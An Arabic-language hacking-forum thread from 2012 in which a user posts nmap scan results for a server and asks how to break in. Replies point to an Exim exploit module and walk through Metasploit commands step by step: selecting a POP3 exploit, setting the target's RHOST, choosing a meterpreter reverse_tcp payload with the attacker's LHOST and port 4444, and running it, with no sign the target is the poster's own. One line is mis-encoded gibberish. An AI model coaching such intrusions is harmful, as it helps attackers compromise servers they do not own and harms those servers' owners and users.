بعد فحص السيرفر بــnmap كيف الاستغلال

scaryhacker · 04-27-2012, 11:41 AM

السلام عليكم
يا شباب انا فحصة سيرفر وهذي النتيجة هل يوجد ثغرة في برامج السيرفر
ويليت طريقة الاستغلال

================================================== ===============

port ______state___ service_______ version
tcp/21_____open_____ ftp__________ Pure-FTPd
tcp/22 ____open____ ssh______ OpenSSH 4.3 (protocol2.0
tcp/25____ open ____smtp _______Exim smtpd 4.77
tcp/53 ____open ____domain____ dns-nsid:bind.version:9.3.6-P1-RedHat-9.3.6-20.P1.e15
tcp/80 ____open ____http ________nginx 0.9.7
tcp/110____open ___pop3 _______ Dovecot pop3d
tcp/143____open___ imap _____ Dovecot imapd
tcp/443____open____ http?______ http-methods

================================================== ===============

المصدر: :: vBspiders Professional Network ::

Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC fu] tpw hgsdvtv fJJnmap ;dt hghsjyghg

الشبح المرح · 04-27-2012, 12:35 PM

جرب الثغرة دي http://www.metasploit.com/modules/ex..._string_format
ممكن تنجح مع الاصدار 4.77
و هدا فيديو لشرحها

scaryhacker معجب بهذا

MO3ETH · 04-27-2012, 01:44 PM

السلام عليكم

إختراق المواقع عنطريق البورت ممكن بمشروع المتاسبلويت الموجود بالباك تراك

بس لازم تعرف طريقة الإستغلال وهل البورت الموفتوح به ثغرة أو لا

بالنسبة للبحث عن الثغرات لها مواقعها مثل

http://www.exploit-db.com/search/

يكفي تحط البورت والثغرات التي تريدها مواقع أجهزة ,,, وهو يعطيك أحدث الثغرات

الأن بالنسبة للفحص اللي عامله لاحظة وجود البورت 110 الخاص بمنفذ pop3 مفتوح ويمكن إستغلاله عنطريق المتا سبلويت

استغلالها كالتالي

بعد فتح المتاسبلويت

ضع الامر search pop3

ورح يظهر لك الاستغلالها المتوفرة

اختر الاستغلال بالامر use متبوعا بالاسم او الرابط هكذا

use linux/pop3/cyrus_pop3d_popsubfolders

ثم show options لأظهار الخيارات المتاحة والمطلوبة من قبل المهاجم

عند تنفيذ الامر انظر ما المطلوب فقط لمطلوب الاي بي المستهدف والبورت

البورت اكتشفناه اثناء الفحص انه مفتوح والاي بي هو الاي بي او الموقع الذي تم فحصه واكتشاف انا المنفذ
110 مفتوح

نكمل الاستغلال بعد تحديد الاي بي المراد اختراقه والذي ظهر لنا اثناء الفحص ونقوم بتحديد بالامر

set RHOST xx.xxx.xxx.xxx

xx.xxx.xxx.xxx:أيبي الموقع

ثم نختار البايلود ويفضل تختار الميتربريتر او اي شيء تريده

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST xxx.xxx.xxx اي بي جهاز المهاجم

set LPORT 4444 بورت مفتوح في جهاز المهاجم

ومن ثم امر الاستغلال exploit

يمكن هذه قديمة يوجد افضل منها فقط انت وبحثك

بالتوفيق

scaryhacker معجب بهذا

vpn_31 · 04-27-2012, 03:19 PM

لأخوان ماقصرو معك

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

بعد فحص السيرفر بــnmap كيف الاستغلال

جـــ'ابات العناكــ'ب